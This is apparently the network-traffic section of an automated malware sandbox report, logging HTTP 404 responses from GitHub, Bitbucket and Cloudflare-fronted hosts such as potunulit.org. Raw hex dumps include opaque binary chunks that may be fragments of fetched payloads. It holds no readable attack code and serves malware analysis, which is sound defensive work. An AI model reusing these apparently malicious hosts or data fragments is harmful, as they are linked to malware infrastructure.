    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: GitHub.comDate: Wed, 15 Feb 2023 15:05:18 GMTContent-Type: text/html; charset=utf-8Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-WithCache-Control: no-cacheStrict-Transport-Security: max-age=31536000; includeSubdomains; preloadX-Frame-Options: denyX-Content-Type-Options: nosniffX-XSS-Protection: 0Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-origin
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-security-policy-report-only: script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://d301sr5gafysq2.cloudfront.net 'nonce-D9MaKyF8h2k6UBS2XSspEA=='; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com; base-uri 'self'; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; object-src 'none'; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com analytics.atlassian.com as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com stats.g.doubleclick.net sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com bqlf8qjztdtr.statuspage.io https://d301sr5gafysq2.cloudfront.net; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com https://d301sr5gafysq2.cloudfront.net; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-websiteserver: envoyx-usage-quota-remaining: 997300.858vary: Accept-Language, Origin, Accept-Encodingx-usage-request-cost: 2751.13Cache-Control: max-age=900Content-Type: text/html; charset=utf-8x-b3-traceid: 06230dd177ac0906x-usage-output-ops: 0x-used-mesh: Falsex-dc-location: Micros-3Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadDate: Wed, 15 Feb 2023 15:05:49 GMTx-usage-user-time: 0.076711x-usage-system-time: 0.005823x-served-by: bdf4fe97c6afx-envoy-upstream-service-time: 196content-language: enx-view-name: bitbucket.apps.downloads.views.download_fileAccept-Ranges: bytesx-static-version: 1d43074db590etag: "5ccddbf36e7fc724ffce3d6261a2647c"x-render-time: 0.18268346786499023Connection: closex-usage-input-ops: 0x-frame-options: SAMEORIGINx-version: 1d43074db590x-request-count: 1467X-Cache-Info: cachingContent-Length: 88205
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: GitHub.comDate: Wed, 15 Feb 2023 15:05:28 GMTContent-Type: text/html; charset=utf-8Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-WithCache-Control: no-cacheStrict-Transport-Security: max-age=31536000; includeSubdomains; preloadX-Frame-Options: denyX-Content-Type-Options: nosniffX-XSS-Protection: 0Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-origin
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: GitHub.comDate: Wed, 15 Feb 2023 15:06:00 GMTContent-Type: text/html; charset=utf-8Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-WithCache-Control: no-cacheStrict-Transport-Security: max-age=31536000; includeSubdomains; preloadX-Frame-Options: denyX-Content-Type-Options: nosniffX-XSS-Protection: 0Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-origin
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Feb 2023 15:04:29 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pbWN7YAfD0Q0si3brimJrnTUO9xg%2BbYvgHmLlGGheEQJGoRRN4mJFly%2FLtmcCnZgAP4vZYq5twkRDxQ5x2t9ZYmkvo4Q3RX1JKNfhZge%2FVM5GKKiIMDGJRn4V4Z%2FQ%2FHe"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 799eefb1d9469022-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 38 0d 0a 04 00 00 00 1f 3d 5a e5 0d 0a Data Ascii: 8=Z
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Feb 2023 15:04:29 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mTvughV8BB65cP%2B0ljMyAN5Ju4ArxnMbpfqUcAMoAwy8qEsuvQpqqSuR%2FTO2oNPuGtyBVep4bNJUB%2FV5m4Z73F34yaN1Yjh4TXyzQI9wdmTIyEvw24h1UgnR61dUM3hD"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 799eefb2aa4f9022-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 35 62 66 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 35 8f e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 a4 80 87 53 bd 1f 91 3a 11 4f 6a f6 cd dc b6 35 5c 77 84 15 25 e2 5b 3c cf c3 0f b6 f5 2c b0 f5 74 d3 37 83 40 04 d4 82 d6 89 3c fb 69 2e d2 38 53 43 3f b8 3b 7d be ee 71 e6 ed 1a ec a5 58 85 aa 3c 2d 60 f7 ed ce 93 df f1 d3 9c cd 4e 9a 16 56 65 f0 76 27 39 db 8c 88 2f e4 f9 32 3a 88 9c 4b 6f 11 fd 68 24 48 c6 18 a5 c0 d3 8e 1c d0 95 4f ab 95 59 24 12 d1 ed 50 ed ff bd 44 5e 74 39 cd ed d4 1c fe 16 90 d5 ed 77 82 fa 1f 13 cc 03 03 a1 cb a1 61 7e de f5 69 b9 19 17 7e 5f af 9a a5 44 c9 a0 c1 b9 dd 7a 5d d5 4e 19 ac 2d 93 a9 59 af 12 f5 be 25 51 61 9a d4 3e 7c 68 28 ca 49 60 a0 ce 6b 9a 77 fd ec 9e 5a 79 ac 87 2f bd 61 40 da 5d bf 46 24 fd f8 12 fc 33 6c 29 7c 4a 8d c7 ed e4 0e a4 e9 7e 71 ed 80 f5 1a 68 9b 4a d8 1f ae cc 4f 3b 79 82 ae 9c 97 05 4c 75 52 ad f3 19 40 2d b9 71 ee 8c a2 b2 75 1e 31 79 82 90 f7 df f5 fc e7 72 3b 4c 80 d0 12 f9 13 73 11 bb d6 af 31 3c 27 d4 69 b7 9f e7 60 cc 46 e5 48 15 ac af 2b d9 55 fc 6e b8 68 92 0e ff 9d 7f 7f 55 40 57 64 7b 39 66 e7 ac 04 28 14 41 40 e3 9f c7 9b dc 43 3d 66 c9 8a 64 b1 1d 30 12 51 8c 70 17 4b 81 6b df 8e 82 01 e8 e4 df fa a1 90 56 a1 54 55 3d 2d b7 1b 2f c3 cb 29 32 28 e7 5b 1e 54 ab 1e 26 ed 11 ee f3 cf 57 a3 4c 1d 85 1f d4 5c 68 91 9c 29 06 f1 2c 5e ae 03 5b e5 1f e4 a6 7d 10 9f 3e cd bc c8 ed 07 99 8a a0 96 7f 74 79 40 6d 43 cc cd 8b 8b e1 66 7a d7 9c 88 c3 e0 2b a9 b4 bb 01 7a 17 28 f2 ae 46 7f fe d3 ce 1b fb 97 6b e3 05 cf d9 37 00 10 e3 1c c9 00 f5 52 48 bc 3a 96 4d cb e7 17 3f dc e5 7e 4d a6 70 d4 43 eb ac d8 58 0a 6e be e3 cf 25 2e 2b 91 ce ec 35 28 c3 a7 0d aa ca d4 5f b1 43 43 9c 55 03 62 18 3a 1d f8 40 aa ae 88 81 c4 a1 f3 0b 0f a9 db a0 e8 c8 2f 0a 23 Data Ascii: 15bf`@0,xO}q4 IJ%9Wd8IkDJ8P>5%y^\.Kij}S.;vKs6(p_6k)|p|t]ShG*S:Oj5\w%[<,t7@<i.8SC?;}qX<-`NVev'9/2:Koh$HOY$PD^t9wa~i~_Dz]N-Y%Qa>|h(I
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Feb 2023 15:04:30 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=eKBTeT%2FLDxY824S5zJ54ZGgcwg3t97rsjMu1Ckm%2BoDYW3yVFySofbHbqEmpzF3H1lcy4hTkJP9Gk6F3INqOSDofRSTe%2B4bCwQawH7SPuUV9OnnFBuXDa%2Bcn73HNJDqX5"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 799eefb64e1f9022-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Feb 2023 15:04:31 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=plD%2BWUbFRGw2MaQy0pVVRuIsWOiiytM8tIDCwBcFinTCAX2PM%2B15%2BCKpMgTNg24O7jEYERdnzuXi4OmRsud9Soj1oUCJTHF3jBjgwKPJtdSYGyWTLPUOuNIGcG9dzsIP"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 799eefb979879022-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 32 39 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 08 94 14 c3 4d 9c e2 0f b3 66 f5 26 0a 5b 22 f9 6a 00 2a 89 40 2c 0d 0a Data Ascii: 29Uys/~(`:Mf&["j*@,
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Feb 2023 15:04:42 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=E%2FxH4kFYC4zSjicu15J2gqqtvTFeh%2Bo6CQ%2BNm9pP084PFAxU53N%2FgSYeexH17PXZSOo9Avl%2FuXAwcUvmibw6oljbFUxm6OvVrKuYiT26x45z6rBG8X7k%2FW3iyrHyXIVg"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 799ef0002ad69ba1-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Feb 2023 15:04:43 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RNeHLeeLtEK31FW%2Bdn2GpcdtpqciPO2fkX1A2pR9JaR1ukjBWc9M6WMLSM5hkUHaD%2BtRi2awayJ9OOchuSa1d5GOb5BfSPd3LjAO1499A4ZDO%2BO4hk45HvVtka9GqKG2"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 799ef0097a039ba1-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 35 62 66 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 fd 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 ba 0c 8f fb a3 93 99 92 0f c3 62 5e d3 50 be 9d c5 de 10 bc 3b 6e 53 94 aa 52 9c 1f fd a0 b8 5d 9b 89 52 2b 28 88 dc 2a a1 07 a6 52 70 a2 da 90 2d b5 33 11 46 f1 b6 46 60 66 4a b3 d6 29 50 2d 5b bd 42 c8 e9 61 c6 3b 2e 70 42 35 d9 c2 92 be bf 6c 13 d9 32 b5 d3 24 33 4f 62 3e 15 21 0b 5a f3 43 93 3a 1a 3e c8 00 8e cc 82 74 d7 07 53 53 fa cb 1f 9e fd 09 51 2a ee 8c 89 7b 7e 11 f6 ff 78 73 40 db c4 0d 13 13 8c 62 e1 92 24 18 4f c5 03 d1 ca a1 61 7e 9e f5 69 a9 19 17 7e 5d af 9a a0 44 c8 a0 c1 b9 dd 7a 08 90 4f 19 e0 2c 95 a9 18 4a e2 96 be 21 51 61 2a 5b 3a 7c 8a 28 c8 c8 6b a1 d0 4a 9a 13 fd ec 9e aa 6b ac 87 3f bd 61 0d c0 5d bf 56 34 fd f8 12 6c 33 6c 29 7c 0a 8d c3 a4 e5 0e 98 eb 7e 71 eb 80 e2 1a 98 d6 4a d8 19 ae cc 4f 3b 79 82 ae 9c 97 02 4c 75 56 ad f3 57 3b 2a b9 72 ee cc 23 b2 75 0e 31 79 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f cb ff cc 46 99 48 15 ac af eb d9 55 3d af ba 68 92 1e ff 9d af 7e 55 40 57 64 7b 39 66 e7 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 f1 8a 64 b1 33 44 77 29 f8 70 17 4b 41 38 de 8e 82 11 e8 e4 1f 0a a0 90 4e a5 54 55 a5 8e b7 1b 6f c3 cb 29 32 28 e7 5b 3e 54 ab 7e 08 19 70 9a a2 ce 57 a3 14 95 90 1f d4 2c 69 91 9c 8b 04 f1 2c 06 af 03 5b e5 1f e4 a6 7d 10 9f 10 b9 d9 b0 d9 07 99 4a e3 96 0c 06 1a 50 6d 43 3c f4 8b 8b e1 62 6d d7 9c c6 c3 e0 2b 53 b7 bb 01 7a 17 28 d2 ae 46 1f d0 a1 aa 7a cf f6 6b a3 cd d0 d9 37 00 80 e3 1c c9 20 f5 52 48 c4 3a 96 4d cb e7 17 3f dc e5 7e 4d a6 70 d4 03 eb ac 98 76 6e 0f ca 82 cf 25 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 5f 29 43 43 9c 55 03 62 18 3a 1d f8 40 aa ae 88 c1 c4 a1 33 25 7d da a9 c3 e8 c8 2f cb e2 Data Ascii: 15bf`@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)|p|t]ShG*b^P;nSR]R+(*Rp-3FF`fJ)P-[Ba;.pB5l2$3Ob>!ZC:>tSSQ*{~xs@b$Oa~i~]DzO,J!Qa*[:|(
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Feb 2023 15:04:44 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3OlcYoQsYalaiQ3rlJ%2BgLdzcBA%2BY75%2F9cq9s%2F4HgKVTNbpUFIYClzukkOhkW632pXY%2BAMSe4r73DvUCPe8cOzmZ42MYhMzZcvzUAC%2FnON8KUOEj85taFoB7KF3ruSJFD"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 799ef00cef4b9ba1-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Feb 2023 15:04:44 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=PkDm%2BloAB1xqwGZ2TK23FQ2xXM6w4%2ByLSlS36x9ksx8oZ3yyib3dPN4kxUZrp9raXCYhuX%2B66koBibCEdh08j2Z0AENOkR0uKmLpkRmKvDc3VSDrKKotUR4pGe1ZwRI1"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 799ef00dd9439ba1-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 33 61 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 f7 75 3a 52 94 04 c5 5b d3 f5 0f b1 2c e2 64 46 56 3a bf 75 1d 77 98 5d 24 18 36 f2 a5 96 b3 d8 21 f7 63 3e 4d 20 a9 b7 a1 a6 0d 0a Data Ascii: 3aUys/~(u:R[,dFV:uw]$6!c>M
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Feb 2023 15:04:45 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7i1yXRKtiYIDv61eX5wSTInAdmpnZOK8vMqOK5bwhrNjQhiiYVdgboKJMvT3CXVMdt53jPjJOJ1htxsQHYtOWsbSPld6NeWgDfQ4Jfc%2B%2BwecgGt1GXQ3o5KOR7UckH5P"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 799ef014afe52c4e-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Feb 2023 15:04:45 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uNlgJ%2BiAQjIOyb1tcQ1bQhW6a8TK0UXInIJDpAkOZeN4aPSmKPoyMq0XrkQV7pLo7RRSRDosbczU8KTep%2BqnoePCahifi3r%2BKemJx1N86JqgP3vCQcjTZmwqDD0vocSV"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 799ef01609862c4e-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 33 37 61 66 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 ed 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 db a0 02 58 c2 3f 14 31 6e 6f ef fd b2 fc 33 3e a4 72 9d 1f 5a c2 de 37 cb fe 11 bc 90 0c 35 fe fa 25 df 88 57 24 51 89 c0 ab 2b f1 